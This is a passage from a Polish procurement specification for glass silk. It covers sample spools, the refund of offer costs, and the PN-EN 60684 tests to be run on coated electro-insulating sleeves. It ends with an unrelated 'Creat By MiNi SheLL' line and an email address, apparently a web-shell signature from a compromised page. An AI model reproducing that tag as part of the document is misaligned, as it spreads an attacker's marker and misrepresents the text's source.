techniczno-jakościowych dostarczonego jedwabiu szklanego. Pakiet I zamówienia - 2 szpule po 2 kg. pakiet II - 2 szpule po 3 kg. pakiet III - 2 szpule po 3 kg. Wykonawcom, którzy złożą próbki wraz z ofertą, zostanie zwrócony ryczałtowy koszt sporządzenia oferty w kwocie 74,00 EUR (słownie: siedemdziesiąt cztery euro), z czego: za Pakiet I: 24,00 EUR; za Pakiet II: 26,00 EUR; za Pakiet III: 24,00 EUR. Pozostała wartość próbek będzie stanowiła koszt Wykonawcy. Dostarczone próbki zostaną przetworzone i niemożliwy będzie ich zwrot zgodnie z art. 77 ustawy Pzp. W celu sprawdzenia określonych przez Zamawiającego wymagań zostaną losowo wybrane i przebadane co najmniej trzy parametry w oparciu o wskazane w opisie przedmiotu zamówienia normy. Tylko dodatni wynik przeprowadzonych badań pozwoli zakwalifikować testowany jedwab do dalszych prób technologicznych i badań jedwabiu na wyrobie. Dodatkowe wymagania sprawdzane na wyrobie przez Zamawiającego: Zamawiający wykona na testowanym jedwabiu próby technologiczne polegające wyprodukowaniu surowych koszulek (półfabrykatu) i ich nasyceniu/ powleczeniu. Próby odbywać się będą w warunkach produkcyjnych przy zachowaniu parametrów normalnego procesu technologicznego stanowiącego tajemnicę przedsiębiorstwa. Na wyprodukowanych koszulkach elektroizolacyjnych przeprowadzone zostaną następujące badania: Koszulki z pokryciem poliuretanowym: oględziny (wykończenie) zgodnie z PN-EN 60684-1 p.9.; sprawdzenie wymiarów zgodnie z PN-EN 60684-3-409 tab. 1.; badanie napięcia przebicia (temp. pokojowa) zgodnie z PN-EN 60684-3-409 tab. 4.; próba zginania po rozgrzaniu zgodnie z PN-EN 60684-3-409 tab. 2.; wykonanie testu starzeniowego zgodnie z instrukcją wewnętrzną. Koszulki z pokryciem silikonowym: oględziny (wykończenie) zgodnie z PN-EN 60684-1 p.9; sprawdzenie wymiarów zgodnie z PN-EN 60684-3-400 tab. 1; badanie napięcia przebicia zgodnie z PN-EN 60684-3-400 tab. 5; próba zginania po rozgrzaniu zgodnie z PN-EN 60684-3-400 tab. 2; sprawdzenie przyczepności silikonu do półfabrykatu zgodnie z instrukcją wewnętrzną. Tylko dodatni wynik przeprowadzonych badań na materiale i wyrobie potwierdza wymaganą jakość jedwabiu szklanego.

Creat By MiNi SheLL
Email: jattceo@gmail.com